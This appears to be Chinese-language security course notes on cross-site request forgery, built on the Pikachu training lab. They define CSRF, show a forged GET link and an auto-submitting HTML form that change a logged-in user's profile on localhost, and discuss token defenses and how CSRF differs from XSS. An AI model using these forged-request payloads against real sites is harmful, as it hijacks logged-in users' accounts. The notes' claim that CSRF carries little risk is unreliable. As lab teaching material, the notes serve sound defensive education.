1.CSRF
1.1 概念
全称是Cross-Site Request Forgery,跨站请求伪造。
黑客利用已经登录的用户,诱导其访问或登录早已构造好的恶意链接的页面。然后在用户毫不知情的情况下,以用户的名义完成非用户本意的操作。
1.2 CSRF的攻击流程
1.3 CSRF的防御
从用户角度,登录一个重要的网站,操作完成后,一定先点击用户退出,然后再访问其它网站,避免遭受CSRF攻击。
2. CSRF漏洞利用的实验
2.1根据抓到的数据包,构造恶意的GET 请求:
因为是GET请求所以是HTTP协议,也要知道网站地址
http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18656565111&add=usa&email=lili%40pikachu.com&submit=submit
引诱lili这个用户去点击黑客构造的链接,(攻击成功的前提条件,lili在没有退出登录的情况下点击)
引诱lili这个用户去点击黑客构造的链接,(lili如果退出登录了,这个攻击就会失败!)
在同一个浏览器下攻击才能成功
2.2 根据抓到的数据包,构造恶意的POST 请求:
Post请求参数放在请求体中,恶意连接需要使用表单实现
<form action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
<input type="text" name="sex" value="boy">
<input type="text" name="phonenum" value="15988767111">
<input type="text" name="add" value="nba+lakes">
<input type="text" name="email" value="lili@tedu.cn">
<input type="submit" name="submit" value="submit" id="postsubmit">
</form>
<script>
// 实现自动提交,含义是当窗口一加载时,实现自动点击表单提交按钮
window.onload=function(){
document.getElementById("postsubmit").click();
}
</script>
在lili没有退出登录的情况下,引诱lili这个用户去访问构造的恶意的建造的.html文件,攻击成功!
在lili退出登录的情况下,引诱lili这个用户去访问构造的恶意的建造的.html文件,攻击失败!
从开发者角度出发,我们应该做到即使用户没有退出登录,我们一样可以防御CSRF攻击!
- 防御:
增加一个令牌 一个表示身份的随机的,一次性的字符串.不会存储在cookie中. 这是它与seesionid的区别.
由于csrf攻击的条件比较苛刻,所以它带来的风险是比较小的.这就是为什么普通企业的网站不在意该类型的漏洞.
对比XSS和CSRF?
xss-黑客能够拿到cookie吗?可以偷到cookie中的数据
csrf-黑客能够拿到cookie吗?不可以,只是对cookie中数据的利用